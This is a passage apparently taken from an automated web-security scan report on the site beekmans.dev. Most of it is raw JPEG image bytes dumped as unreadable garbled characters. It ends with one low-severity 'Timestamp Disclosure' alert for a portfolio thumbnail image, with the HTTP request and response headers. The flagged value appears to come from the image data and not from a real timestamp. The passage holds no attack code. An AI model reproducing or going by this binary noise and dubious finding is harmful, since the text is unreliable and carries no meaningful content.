          míÁÁ¼LD4yßóø¿÷ìÕlQŠ\¯¿åþEûzóé}òÿä‹?g¶ÿŸÕÿ¿f³ÛÏêÿß³U…èå}ÿ/òmOþ}/¾_ü‘%Ź€¯ÌeYzQU«øòµÿÿ:«N
          µ©ˆF-“ûÒ¨QEFEPQ֖ŠJ)i
          ”´PQKE0§‚ÝdV–WòáC‚ÝI>ƒÞžºuÁPÌ<ôÀK}û¶ŽØp±(ÈõcÉ5“šo–,íŽT¢ê֋²Ù=.Þß.¿ðâ}ªâ+8ÊúÈKPö—kÄ-Øôt9_ÄUJr#ÈÛQYÏ §È‘+RNÍ&»Y~Šÿv¢ËÁ)ÆZe_¸¶¸6p3ÂûÓ*xÏËڨӄ¹‘šKY¤õWóWü6Š(«9‚Š( Š( ¤bU‡P§ùQM˜™þí±OíëGÚÖ¡¢ŽTiíjw&óßÖ¦ŒÈ꺨c…ÏsUYBjΣç¸ö©’Hތå'«üG¯šq¹•I;@=Íæ°0ÙÚ§© È“29`›\’\g<RùˆòG1`»:¯~¤ŒTjuû·ø¿KýÅË$fŒ1#sÜÕ¼¶:Œ‘*½£)D“pWTû—!ò8\b¹'¬™ïáì©FÌ	luÆqíM%€<Œ’(,2_#•Æ;çŒË–|ŽG¥#IKÌ	qžA#¨ô©mî$‚MÊA óŽÕ	eϐwtˆÁ\¶AÉâ›WDÆ|²ºd—sÉ4…‰ç\–ìAçS݂99ÎHéQ†Tþ,äöôªŠ²1«>i]±	cŒrqM%Ž0A½(`€ƒÏjh!@\ç®H«9[ó"™†Aõª‡p=F1œÕÖ !RG óT؏¹‘Ó¯jÞ™‰I;‰ózŒc9¤ù½F1œÑ‘·fGN¿‚6ätև–ÉÉô|Ã9 ZBAséƒCÃnqZ7r(ù»9ÅCwÇ=è$7|`÷¦&IŒ‡ÐӍËäÔJC09Æ
          !<š›+šª’Q²`A
          8¦m ã*ðƒ<ñM^ƒÎ*“1q´çæ‚ëÅ<}ÜwÁÅ5¸U­;’ãd6Š(¦f(RÝiB³tҀJ½sÍ=²ßwŸ›µKfÊ*ÄaYºh
          ÄdEJÙb6öcKÖD+÷A<úsJåªh‡k-ƒÞ­·v=iÊ~I=;~tõ-õ֝Èå_€›[nì½3SH¬!VÁÁïQõýáýjWÿ1þÿô©{›B+•ú` ‡Ö”«(”€zg½+¨O÷ô¡Î`>­ý)ÜÍÅkè¿AYq¹HÏL÷¡‘“”‚FFiÒåD}ó¢SòÄ{ìþ¦‹±¸­~_ ÖFB)ö4¥X+){b–bv{쳓¹-•cqŠ¿Òޝ°©
          éÞµlÃØT†«6è‘9íò¯ò¥~õþ£ùV5uŠ=,P­%ÙÛóÿ"ÐVÝ·>” 1m })Xÿ¤÷¨ññÿþµÆ}JöóU™¶€Iô¤œpw…œSâl知UÚgfQ€zWV;¶x™ÍHòFomä„n>µj$Âc½Sˆ2õ?éZr™®‰Ÿ=	«¸«²­TsR†Bi)ؤ4Ä&*Οÿ±þ?ʫԶ²,7(흠óS5x´ta$£ˆ§)lšüÍ?ìÛoî?ýõGöe·÷þúª¾MÉû·ˆÃ±ó±Iä]ÿÏÚßêä´¿œú_k‡ÿ OÈ·ý™kýÇÿ¾¨þ̶þãÿßUSÈ»ÿŸ´ÿ¿ôyóöŸ÷þŽY8{\?ý~’ü-¢À±"78ÝéTþØÿóÎûô)÷û¸¡2y®€–`r2{fª×E8.]O‰’Ä?dùVš.š->[óæHadþ #‘õ¨ç‡Éqµ·FÃr7¨¨êÄ²§Ù¤ 9ð·ø»rêŽhÔuýɽz?>ޏð2µæFF*À†zRb¬åi§f%©i(QKڒ€­³ý’8ãÆÒ0ÞåÐg ü¿GkÉ0ßþ­çúóŠŽYiZFêÇ5Þv:©·JŸ:Ýè¿Wù/¼”^Éÿ< ÿ¿B¤µš{¦EÝå@Š©V¬Š±’Ý›oœ›A=›µLâ”]°ÕªN´T¥}í~övülVvi³±f=ÍO}óH“»*> `ІHÚ')"•aÔgn¿­]®ÓG/;Œe	­]¾õÿÇÅM*Æ¿yŽYžëÉͽ¡ÙðÎ:¹õÍAm8·˜IØ}ª,Òq¼µØÒ•*^ã÷›×ºZ~zßВ;‰¢}É+ƒþõO>Û«stªD JCž†ªdzÕ»pRÊæFáB®ˆçµ)¤­%¹xiÊ¢•);ÆÍú4®Ÿ–ºyìS¢–ŠÐâ
          JZ(RRÒS¦N	·pIÀÇãO¨îN-Û×#v e3«ì*Czw Æáü½§vqŽõ%Á"Pz‹ü¨¹$]>8çúRRgL©Å_ÉÛóÿ"?-üÏ/iߜb”Fåü°¤¶qŠ’rE䝾zRq~ë¯õ¥v?g&¼ìD¨îÛUIoAB#»mU,}>#þ˜¿õÓúÑmÿh=Z†ØF	´»»~F…–Z/”Šœoº3PÙ²ÆÏcü©MÀ1.ÎHnqúW$“rv>†Œ£QædXçœSpH$QMt]×Êä9#·5Lò<l‡åsíÏøSPlΦ"švZ–¾ðÈäR 9ݎ=j’ÈÞdL¿pŸny©á¸6úŠrƒHŠxˆIëýirYdœzÔdgzÔ¬rῇoô¨³û£õ¤‹¨•ƐqœqI‚zԍ÷œÿ	TM­cüªÖ§<í¨ÉI …ª¸fɚ³:®ÜðÜÐ~b¥z=>µ¼t<º¯Ú;‘$dE ð9©z²•è	þtÅç~:‘ÅUÌRkg9ô¤“€2iý~ôÕÿX>´îO*¸€Ӛ“Ú”rŒ\ӛ‘Ç'<ÑpQÐD“AëOêxçšF+¸ýjM-d4ýÊeYh'ÌEÉôúSžÕuVc$`ž†ŽtSÃÔ×õØ©EX6èőoB'¡ç{·ÈØl÷´ù‘ŒÑ,±¢º'k(<Ô¿gŒ‚¹má7ŸN™ÇåG2BMµØ­EYkx€uƒÆ2rx=2?Zl‘F#ŽD-†9ö¥Î™N„ã{ôÿ;QWెD‡ÌgVŸ;Æ=j²ÄŸhXä,œ½sœRSL©aªEE¾¿ð?ÍÑVÅ´@Î[yX[hÁ±'8°·Q$²<žR•·mÜþ”:‘EÇV[[ú¿ù?é£6¦õB¦º²[{³bT0ù½AïR]ÛDŒ«>ªß7\š\騥†©$úhP¢®}š	,x́ü͌1О*Ëip3ËO šî †äNH¡ÔH˜á*I]_Ռª+XiVóÈRÙå9Ä.\ƒI‡§N•YÙ2’Ic‚9¼¹7aŽ;0ÇãÅÒ%<U®Ÿß÷u3zÑÍlͤ[-üÇ,¿g’33cpŸä)±é–³@·ŠÒ­°GgBA`WŽù©{X•õ×kM<ý5ôÔÉ<û֍ùië§Ù›Bò̖÷I•ƒgÏõ©¬vZŒÖÊÌʲùi“Éàuüê*M5dtá0ó§SžV¶ß…É;5û>wŽ6}ñʱ’Äa²q‘éÍ2[{u…¥ÌÂI±·Ï§·JäNîÈú¹KdT‘„q¸n~¾ÕXI‚8?=Ûs–r1L…l"ü§=G5éÂ*1±ñXŠÎµG7Ôx;˜äô횽ܬ´óÉÁñZ6»¶sÔ™™Ä–Nj¤‹Í\n*¼‚¡ʍL5+
          aBE.)h˜¤#ڝA b“ҟM4ÂÂQKE%§F);ÿ¥Aæg÷Ñ›ýµõúНKNò¤òüݧfq»¶i%Êm9:®öÖÚùùÿŸÞ2’—ӕó±Y¾ƒ5F)7¢Š+pYÚ:(h6Ñìj	´„<ÂåO£r?:çXˆ7g¡íÔÈñQ4-/G¯âR?¹²üsœŸe?3üª½I,2Bû$R§ùÓ+hÚ×<ªÎ\ܲV¶–þ¼îÆÑKEQ‰au•P¾``:nPi´.}SþýŠ­IQìáØéXÌJVöïe¯íŸTÿ¿bíTÿ¿bªÑG³‡aýwÿ?ÞË?Ú©ÿ~ÅE5Ä×®[aQPi¨E;¤Dñ5êG–smz°¢ƒÒŠ£œ))i)ˆ(¢Š*+¿õð!ýjZl¨$ˆ®Nyaø
          MظEÊVE´u«
          eã]Ûã$ž­#Åówn©'†ìis#¡Ñ’þ¿®Äç9挜ç<Ô©a¤ÝóœƒÖ5[;Ðc§Ÿ2'ÙKúûȳùÐ2AÁ©’$Äa÷n“¡§jQ
          åclïaœö”¹Õ2íýãI“êjap‡;Ùsœð;â)>ç;ÊîÎxéœQtÎ×äC’;ѓëR´h7 Îõ'±õ¦ª¨Mï’3€Å;¢\$†f;©íF~l[qëIx™”ž9ÅV„”’.+ezÐXzÕb2w.Bà’3éMfÆÓÎÖíYrλKTM$ µQܱ§7>rUOOZ
          (ËrW´ŠHã«9T#¢ž|À9ÁR6îlõÆ]Î~V74•!U\îÉçl®O8⋠ädtí§niëw4;â•ÊP²»"¢œ æ€9äÕØ­)ëJªóëASÔÑ&‘+N
          ³í>c.	íõ¥{µer¨DŽcž?
          ƒ\Rm÷ãÍ.ThëTé×úýIÂ‚ΊC¹äð;ñøÓd•
          2¢‘½·6OéQ|ô¥+Œò8ëO•êÍÜsȐ÷T-Kö„ې­¼¦ÃÏ1ŸÊ žàg¥ 8éG*ViÝu,µÊä#oa²x÷ÇåQ´ªc8PAÏ|Ó6ûŒc9£o¸Æ3š\©*µ%¿õÔ¹ôq$aâghs°ç×Öªù¿¾Y8lýyÍ0©sҔ¡ìAç(ÅjT«ÕšQ}?¯ÑÌe¦¯¶fÝÁSœŠ™u˜’BÆ'*B«`®Þ•D®r842í#r:Ô¸E—Uhmù.·ÿ6Xº¼7
          0]¥ˆãЂ¤¹¹Y62!*©õÀÅSeÚÀdsŽjWC‚ͱV)V«.fÞ­þ#ÖéÏìꭟ7~IíŒb­>«i%†'LA± œ}HŸåôøÎêk.ÜsFArE±,Eh-?O멤uXâbö°º³Î&pìàçhöäÔSÞÀе¼:Ç$†G.FsØaÏçTÊaTäޔãà àÚ’„QO^I§úZõ4_WCum(…Œq[ˆ]IûÃÐК¬F¶©†×c«îa½·wô㳚= Á°pqڑÓap9È£’<V!]ßòþº%¿®-<¸ØCjPHÜÜä“Ks¨­Î£-ÈF@òyŠ22>¿•SX‹ó[î©ï@OÝù›†ŽôùbG¶¬þzýËüŽž-R6Ý,Qº¼’	$9ÀöÍC}wˆÇQ·°r?Ç¥g‰~Ëm¤a gÃ,¹’yã½E*)K˜ëÆæ2/džûÿ‘#^B¼»>£¥0ê)ýÓÏ\<›u»àýìdR–¶Ì*z®“Ä/Óvy­e"Éå9¬o*ÞO¸¿÷É­-%BÁ 
          ‘º¢[ûT2T¤ÔoÍfYU‡4Ú{Ži˜¦HÒ(ÿ*B±ړɗþy?ýóK™w5ö5ÙpÚCOòeÿžOÿ|škÆëË#(÷¦š¥Q+¸¿¸fi)i)™…–Тނ€'³µ72`ä"ýãý+VP¬ŸeåpAèƒÔÔp…³±ÜÐ77¹ô¨cÈ	\í<çԞŠ+†rs•ú#ì0Ôaƒ£m{ÓW—’íåÖþJO±$QÅ
          !Shiåè~žµ]Û¯k‰¿Ý;òª—7/rùn}Ô¥†ÊY“zíUÏ›­}šJóg›,lêKÙaat¼¿M­ëwæYvǤ—1{ïÜ*ÂM$i¿rÍ÷㏪ÿ…gËa4q™ÆUëµ³ŠŽ	ä·pñ¶qØÐéÆKÝw1õðõkǗÓOÃgø?3fH⻇k`©v÷‹<
          o)»t>¢´¡‘T¤±qǸÿàjõ×Ú/—´!#'­MhÊËc£6•
          ÔIiS˪ÿ+j¾îåLsE/zJì>`))x£h£Š((4´P!(ÅPHii
          QE0
          Žyqƒ‚X‚ì3Rf¡Ÿ
          µIJV¹Q“‹º#iÔïeRÆ úR<ÊÛÊ©
          'ÞÉà})¯Mœ†/Ð
           ÊÛNM‘ÔçQ§ý[Š’&ÕWRv®_cH$æBܗ~´4,X1qGJF‹êÊN3Óž„·Sî’¨YIhþîë@˜|®A.£ö4ÃùyŒç¶1šx+ó‚­ÑºQd>j‹åýñ*Œ6ð»G§Ö“Í_½ƒ¿nßoLÓLDHÊXazµ5×a¨# ŽôY	΢ZiTî`§{JjºìØà‘œŒR´eA;+÷€íHѐT·LSЖç}GUùu<6F?•$r~ô±ݜÓY0¹ƒŽÔè£$Ž@' õ¢ÊÀœÜÑ •U¶àíÁõ²‡ (áirdqڛåœuÆqI%¸å9µÊ.ðYòѼ©n)¥~PÙiJ##¨ªÐÊò
          ÿ8lp;PÆÒ3ž)
          àsŸJz¨_BAÁ£@WlP7}áÆsÅ)e{×4ŽØpj<dÏJV¹n\º!ÆLœ‘È4ÃÍ(\ãžOAI—9ªÐɹ=ÁNiAÁ(ÛÇ^qœRcåÎh¨z¶O>¹ žM"®	ç‘ÔRãý¡Hµ{rlÒdcn{u«‘ù|uªø\â’w.pqž˜ç>cœæ”¨x¥Ú1žÔÌìÄ!rqŠ@~cž3švьö (=9 ,Ã#sÛ­۞ÝhÂѰŒPV¢—í¥“œäö¥Ø3ŒsFÁœcš4RCNšä.E§lÆ9£`Î1ÍBq×9#ð*vaëÁ\gð¦$j_}jôÐÛýœmûޕœ¤“Hë¡FsŒ¥tP¡<½ÃyíŸò)®FAÎÑɧˆÁ$I,a³€N*®ŒdՆîcîT’E<:ÆYƒÜÀ€=3š ÙÀ'hX•*	‡b¢¦¶þºÅU
          ¼Œcқ#8@
          H"V€Hè)]À¾´]„Ú3…€òÇ#¹Ç¥>Ñ¡Ã`áƒcó¦ùK·vßZµ¬pœ[Ÿ­8Ù²j9E]ÿWV$‘ÄdŸÎ—2X*Ԛhàî<ž£ž•"í=sZœ´ôIóþ}©H `»m#ŒÿŸþµ*‚`1§½
          Ø$õÁû¿çñ 
          —Ê	e;[ۏήhÎíÁÎHaM?0¯áVtÔQæíõþµØqÜ´j&©ˆö¨˜VF„-Qš•…DÔÉ$¹‘Ä̰t>Ôè!šdÞfe^ܞj;¯õíôÊ­Ù¾ëu#oZå›q¤œO¤Áӎ#0©
          ­ÚòÒï¹Rág·`¬AèA4ŠîöÓbØÛÔç½M¨¿ÜL\Õx¿ãÞ¢ÿ:¸>jjO}?3›K:Po–ÒÝÿq‘QRyŽÏÔRýš_î~¢¶çsÌúµäs"¢¥û4¿ÜýEf›ûŸ¨£ž=Ãêµÿ‘ý̊Ÿï™±`)ͪ¥Šp:ò)±?—*9΁4^ëA*r§R*ªkÕt5n˜f%?w~æúš¥rì¶q'ñJLRµ¹}ª…pŒž¼T7œ¥»v1Šæ¥“þ·>‡0ÄB¬*Ô¤î¶ù{·þ¼Ê¹©œÌð¤f6*Ÿwå5ëSýáüëfi#vQ’ 3ZU©ÈÒ±Á–àV&I9¸¥½•î·ý
          ˆëÎQ†c㎵LÖÌ4°$Œ0[Ò²®¿ãê_÷*U§$Ѧcƒ…-)ÂW^–ßRk3æE<ð˹}ˆ¦^)óVR1æ¨oÇÓ¬8™Û²ÆÄÓ¯³¶Ù?ˆGþïj¶3pç˹žëo¿Oý)”¨©¾Ë7÷?QGÙfþçþ<+^x÷<ïª×þG÷2JŸì³sõ%¬%ge‘>Y 6¡ÔŠW¹Tð•¥5E«év™RŠÒŽ(Úbâ4}ª¡‚ýÝÄóÂ¢^Xq˜>H2ô¨öË]—–Í8ûÊ͵÷~¯]
          T•pkR#X̊	‘X|ßQSxÜ8T”˜8ÇçC¬–á¶uâú'÷§§­Õ½Y›E]”Ç´©6ùJ€G
          •`EyV>dPŒã#$Pë$¯aÇ-”¥Ê¤¿áÓkïHͤ«ÄÇ)XUƒÌˆãÒ«\ ŽâD_º­Wó;µð®”y¯}¿tEEV‡ ”×PØÉˆ§SXûMf²’>éÈæ¢“lk"‡]†ì=éì1’¼úŠjªÈ	 ð)Iu7¥'ð!вBÙÈ	ƒŽÝiµ!òÃ%²qô©|•Ù¿o­!…BoÁÛëQtt8NÖºùÍó|¬›séÅ2Bhƒ’HéÍHbP»ˆ!}i%P‚ïBhRŒÚwZIFá‡è{S€(ÎÁ×ךD¬	PHЈH’i«%7óÿ;ƒ20†Aøçš@áL'®ÑÏçJȪpÜjq´h&§ë½Æ¶ÕB¡ƒdçŠ|L»‘²>Q‚)jßtSÙ¤-.ғIJ•D•ŠÌFשŗ!óÑqz±y+.¥WØ1œSM5qT„¡7Ã3û¼wÍ8²å›?xt¥­Ðf€€ôZ%!»€Tõ—pRNs“FÕ4Q׊4¼!À
          ƒœš@~VúS¶ŒgµAéÍ+¸€Œ«g éMþ;æž”¥123»=ºSsòû柴M£ Vb®2Ç=i
          K!?7J¤YëSÍ©²¤å܁²SOzoü´¤þmRF2–£ˆÂz旸=¶Ó(§by‡÷'¶Ú@2„¹¦Ñ@sÏïiW!px'8üª:(°Ô‰…¾)FvíŠ–‹
          L“›‹?Ü+ü[GGE+œ”ä®ÑË`f¤“-ђF2Ò«TŒ~JMFz1ÒeÁÉÝÎ>”®çg$?8¨3Š\Ñb}¥ïæNÙwRœ€ç8úÑË<lŸt1ü9¨(£”¯k®Å’ñ2ýÐNO§4õˆãîëØzÕ|ўԹFªù"·;<¼gðéùÕ°pÄwíYÉ˨'ŒŠ¼Än;Iä÷«Š±Ióù@ËŽôõ$œ\cÀA MØÝ×éTdKÀÆ[>€w¤ÞJåyÜ9Ð9$üǸïJØ à€i€å'ËwþµwNÎdçYÊó÷Gaž¿çó­4åä ½ê%°ã¹p­FëRÓXV&…VZÆ3VÝj¼£¯BbLžeØOïþU¢PF©	a,¬ÌÛ·Û'Û õoûæ¸jÆrI%±ö}l5T©9¤äßU·Bi£DÈzžžÆ³¢ÿQ?®ó«ŸoƒÕ¿ïš¨ïI|¶fi;À檊š\­v1ÌêaªÎ5iÍ6”“Õu‹·âAJ‚–»O”bŠ(x¤¢’€%µEpŽxÁ«W1n…š#¹}ÔÖ}\Šy$
          ýlCF†°©u${
          Е)aç×kyïóÑ5Ý«u*ÆÁdV=Ö£ÜÛ:²´£kµMàIòöü7ñDx#éU™JŸqD£­kf‹£_—FIEJ2ë«OúꞦ¤w± E”3šÌÃÎî½‰ŠŒç
          ¥°«	l°áîzÿc’hŒcIÞ÷lU±ŒÂœaÊ£õÙ/ë²mÈ@'
          pp?ÝïPÞÊ%¹b>èùEYh§‘^<ÖBçîAïYäpFíE+JNWÔ1îT¨BŠ‹Q}_[_ñ»m®—K Ÿ…´†ºÁÅ9$hó·p*~”Ú;RÜq“‹¼wæ0ËßH/&͕ÜÇ$í¨))8Åîcˆ«†M|ÉM̞W–
          F2'ñ¥[©”¡>EÚ¼v¨hÍ‘ìY?ýý¶%ŽæH”… ‚s†ç֓ϓŸ›9mäûÔY¢Ÿ,o{ÛÕ²3²ó'“.pTrNvŽ	ô¨	Ï9É4RP¢–ÈU+T¨’œ›°QEFALsÎ;{Óê7?1ö¦„79ýqMFÙ 8àäF<
          AÉ›Õ-Ŧ‡œï/üVíÓ§çHÙß#Ÿ¸SƒØñÀªäòFxÏJLž«>S©Ö¿O2ÉâY¾áǦ)®yź1àúóPg·j3G(TúNÿæL¡™bÙü,síÍ5d“oñ¶£Í%UŒý¦ßב#ð‘«uãÛ4æ4¬~é_J‡4f‹ŸúùXÑ®ÞÍÍ:3™ßo|â¡Í*}êgª6p õæƒ÷™¿„¯Çûԙ¡-)ûÌpDžäîæœùo»ÏÍÎ*:Jv'›Kg26;çÖá¼Óh¢Âr¹!êDZÐ	A^i´Q`r$o›îÿzƒÉ}j:(°ù‰:²‘ÐAÉR:
          eX9‰S¨#¦)á†:Ô+փI¢ã;!ý֛Ѕìzђ›¸BBrC‡P½ˆæŽá{b›¸ãn8Å;̇w+Û¥{MÜqŠ7b‹2ˆv)Œw<Ò$b€Ät¢ÁÌ®;;{g£•Ýߘ	=èÜsš,
          HðîïëKü;»àS7æÇ9¥b¹ÐóÀÜ:)ò±îЇqÎsÖ¤f;sëëI£HÍYƒ€•$ÿJ÷|¯oò)Øgž½s@vç¯<Ó±<葾F@ÁcŸð¥ûŒª£†'>üÔAØt>ô¡ÙF¥b½¢¹ ùYUºûó@áÖ?á+Ï¿½F”`þµØ.Üñô¥aª‹úü‰¢æxâÇÊ@ÏÙÍMœÕ1+.=*Øädt«JÆ5$¤)4ªx óžØ¦fœ0jŒÉ€@3ù
          ïc¸œ:bÉì4I!Úzmü¨øØHä³míÓ5§§£FïûÀÈWŒ6yúVT.½]3ý+KNT;FÄ©^ýje°Öæ!éGzCšÀԍ…W‘jÃ…ÅRQÅDjʅ…RÌÑHM¦!A§S)sÅ:Šnii¹¤4™¢€®ÙO)€ROÞ=êœhep¹Àî}­0õ8äv¨œT×+;0µêaf«ÅykøÿÚ†uܤ±ܧSËcå»ô‘*‘$ãšJ…E(¤Îš™IU•H+_³kñM_æ^7LGÍvô)‘ÜD’©
          pOÌìrßýj©EW²¬bó
          ÎJ]W{¿Í»|¬_¸¹X$anÃ,>`:ê=ê‰$óޜ#ÌEÁåO#Û֙NœTU‘¼EJò斉ê—E~ß=üÃ4¹¦ÑZBæŠJJ\њJJZ)(¦Fi( ¢ÒPÑIE.j´‰›Ðš°:ÕG9vúšhB’AÅ 4¤ðçBŒÓíþ±£ÀÙ³8Ç|g5 4¨­ÐžhiXägŽ9Å0Ž
          BFîi´ÿ¯BÄg͸
          ÇNJù‹¹€%IÇÕ‘‰ã<sA‘‰8ÇLR³-UõÔVbcW8-’3Ž´“­jk1lg·@#1c“Ö©#)NêރÉÌ#Ù½=©"8~܃MÉÛ·¶s@%NGZvОoy18ÿZO¢çô¨)èÇx9憇NVc۟˜ýìa?q»šŽüæšI'&’C”•Çg÷¨_õŸ7'9ïœÑ“œ÷§byµ>øúÐÔÈëš@pr(Ž”	1íòôîiåéÜÓCހÄQaó!q†on”½Fîø4ÐH9ïFãœÑ`RBç•=Í!ûÇëFI9¤ –î<íúRî>ߕ1O#ڗ4¬Zzy`÷â“Ê´úZ¢.3É´y=jAE¹‘ÏZ_ zԔP#û8ÏÞ ÁŽ„cRÑ@\‡È>Çñ¥íÏOnjjZrnØçñ [· >ù©és@\®-›Œîsҟöv*{œÔÀ҃JÃSh¯öWÆ03޹ïGÙÀÎ:ç½YÍ.h°¹ŠÆÍÈ ÇC»­]³ðõõülöñ®Õ8πjΗ§É¨Üm/28ì=½v*AEDUÅDåm
          #vq¿ð†j­ÀHG<8sOÿ„#Xlb(G?óØ+·Föý*ÊØ`V^іp
          àMh®VAÿ®Ã‘UotGH¶ßy„Î#nÇ×ê
          p85‰ÈÉ"+«u…U¡8\òbÝä3Žýk²Ôüå¥Ó¥9ÿ–dåOøW/}£êZk´Ú¶ÑüiÈ­£4ö2qh®ÇïQÈÇh¦‰•†ÓÅ/
          ÆsTI8m‘¨pwÎ*ö”WÏfSÁN;Ös1,v®@«Ú@ýìŸÂUzR–Ã[šÅ¨-L&“ŠÈÐ…BÍJÄÔLM1
          sP1§;TLj‘"Iš”°†5ۂíó®p)¢á·
          Á
          矐t¥vöGC¥µÊÏÒÿ¨ÌÒæ¤+hIIJþí.Û_ùë'ýñKvpþ­/æþ¿Ì‹4O‘#ï‰Ëàäb¡ÍRw1©	AÙÿ˜ìњfjXBäÈü¢rG©ì(nÊá9ÉEcäóøäoaØZ‡4Žìì]ŽKšnhвY©KÝÙh¿¯=ØìѺ›š3LÈvhÍ74f˜A I>o¸Ãk})’)ŽFFê§ó¦R¹ómÖOâåo§cý*ŽçD}ún=V«Ó¯ùýäy£4Üњ³œvhÍ35 Ó¤d@1aö‚:w¨”œvGV„j¦å+%o½ßÍ.YG"ŒÕ‰gº„€åpz ƒô¦}¶oï/ýð)''ª_ü•*0—,¥$ÿ¿ù"њ˜]Ü3R	=AS–€~ù•ßþyªŽ>¦‡).Ÿ×Ü\0ôf¯ÎÒ]\U¿ô¯ÁjSÍ©.ñç’PH¤T9«Nêç5X{9¸vc³IšLњfbæŒÓsE8ET?xçÖ¬ƒU3Mq§&`çíL54Q–#¡ÑÙd°$Ž=ªÄ:3Èd\žx«ÖvLøÈ5³og°
          –ÊW0âð˲ü÷(	îñU®´cjÅYÏ=ë‚m¦ËKŽEܧ¨"¥Hv8¿°
          ¸ó>o\R·ùõÅl_éÏlL‘åâýV³óZ+2ecd6¿Ÿ\R0:¾
          ²M&iŠå±ŸŸ>œP¶¡y-šŸ4™¢ÃRh€ÛŸ›žÔUÇ,IúT٤ͻ!û2ã–?•'ÙG÷ÿJž’€¹·_R)
          ºö$TԔÈ~οÞ?•g_ïʦ¤ D^Bã©£È\u5%ä~B㩤òTw&¤¤ .4D õ4ykïN¢€»KIEKM¢Ž¥¦Š\Ð!ÔRQ@Å¥¤¢KIK@šZm--Y²³’úåaüLz(õ¨mà’êu†%Üìx®ÊÃLŠÊÜFŽ]½MD¥ÊTcrõ½•ºAùGsÜúš¶zƒøU%zùœÔ‹n½7þµÎìl^F„taJ™
          ¿Rj‚[(þ:”@ŸóÒ§B%šïvÀ§«ÛÍ’zb³Å¸Çúŧþz/åK@ÔÔGµ'ïñŽI9²t*Ø ö"³–ÝOÔýL–ê?å¨ÿ¾(Ðz™:ǃtH3ÀD2z\V£à½BĖ„¨;¨5ê+
          €?yÿŽÔ‚è_ÿ«FˆpLðéDöìRU ûе£HMñ¨kÖ¯t
          ?Q\NªO¨Ašäõo	[èàß[ɕn1ëZª‰èCƒFa4ÒÔÖcLf>´;T.Ô¬Õ51
          cQ±¥cQ“T"IŽv¸*<Ó¦?êÿÜiGcZÿÄcÁ šfêBÕF%…ÖÅT|ÁÀúS|™¿ç“þTÐßèí þF¢Þ}OçP¯wcªn±æOnþoȟȘÿË'ü¨™Â
          œ„êGvïPn?Þ?&êvwÔÍԊ‹P[ùÿÀš3LÝFjŒGæŒÓ3Iš“4™¦fÔüԐHL7Üqµ¾•hÍ&®¬T&á%%вmŸþzEÿ}ŠO³¿üô‹þþ
          ­š3JÒîkÏGù_ßÿšHÚ0	d9þëO¼?é-ôÊ«f¦¼?éOø*_i|ÿB¯F\ªÚÇò±Ü4`¡ã=Qºõ©þTó¬Ûø•¾ðúzÕ\Òf›Žºϗ–k™-¯ÓçÛȴפ±OV?y¿Â 'ƒLͦ’DT©*›ÿÀE›³ûóì£ùT9§Ý7úKþÊ¡Í(|(¬Kýôý_æ?4™¦æŒÕŽÍ¦fŒÐ"@jº­J§'ÕfÖÁ¥aÍ"†Õå<V݆‘Жñ«6Z9Çð­h¬cçΡȥm­’%:qïV7(þ4¦‹TÆß5­ÓûíùÖw.ÚEÿž‹Q4£ûëMxP~uB¿ÞoΘ‡³‚0YH=«ÿKS™mˆÏxóü«M£\ÿçL(ž­øš¤ì&®s FíMÍnÞéñÜÈBÈ;úÖ‘¼NQԆªw3jÃsFh¤¦ ¢’Š)(¢€
          J( ’Š(¤ÍPIFhÍ%¢Šm-%´´”PÒÒQ@¢“4´´´ÚZZZJ(iȍ#„E,Ìp¦Œ’äšÞÓ,~Ê¢i2ÿ|ÒnÃJ憓§¥„$±g3z{
          Ó2۟­f†ä{SÃc°®w®æËCL<y'pÀïO¦Þ«Ÿ­fn'²ô§ç?.~•<¥\Õ(ÇL÷æ¤YОÊ>µð€§‡ÁþøRåšâtìê½<L˜åük$;g¨ü©âBØäþí.QÜÙIâƵ2\GŸ½ŸÇXKœç·ûµ*¹þˆ)rŽæâÍçsOC·ïuéŠÃ»ªÿã•"µ?
          Vͱ$š²¼S$Røzr€ðËÎ}èBàõO]vmáH .·"œV¨Oc‹/ÅFÒR;TõÓcìõ51ž£/UbG–¦¦–¦–¦ÞjPñ’Tc!±IæCÿ<›þû¨R©åF¾Ú^_rÿ"Á’ùâß÷ßÿZ“͇þx·ý÷ÿÖªù£4r öÒì¾åþDí2˜ü´M œœ¶j=Õê7SJÄJnnì“u&êfê7S ~ê7Ty£4&ê3Qî£4ýÔn¦n£4ýÔn¦fŒÐ÷Qº™š3@ÍNóÃ#xŸq뵸ª™¥Í'Í!RPM/ÊåößóÊOûïÿ­Fûoùå'ý÷ÿÖªù£4r•íŸe÷/ò,o¶ÿžRßýjMöÿóÊOûïÿ­UóFhålû/¹‘,’™dg#Jni™£4Ò±”¤äÛ{±ù£4Ìњbš3MÍ 	ü߅kX8VMº™%Ú98­Ë->N	$
          —a£ µ•vÅ[I—Ò³a€Æ£÷„þh‹5E¿=;ƒŸ¥DóǞ‡ò¨EÿžQ<ƒ?xÑ`¹3L¾‡ò¨Ì럻úT%ÿÚ4Æ=ë•§ÜoÊ¢3c’:Œ¸þñ D†oö*µÔit›^<ÍÜSËÓK­01n-ä·l0ã±õ¨s[åº•nAíYw6†,¼2~¢´Nä4W¤£4•D‹IERQE”´”RQE%Q@’–ŠÿÙ
          Evidence
          151388160
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        31. GET https://beekmans.dev/img/portfolio/minor/blue/36-thumbnail.jpg
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          20131229, which evaluates to: 1970-08-22 01:00:29

          Request
          Request line and header section (265 bytes)
          GET https://beekmans.dev/img/portfolio/minor/blue/36-thumbnail.jpg HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1158 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:08 GMT
          Content-Type: image/jpeg
          Content-Length: 64833
          Connection: keep-alive
          last-modified: Tue, 02 Nov 2021 10:18:04 GMT
          etag: "fd41-5cfcb9beafa60"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 1099
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
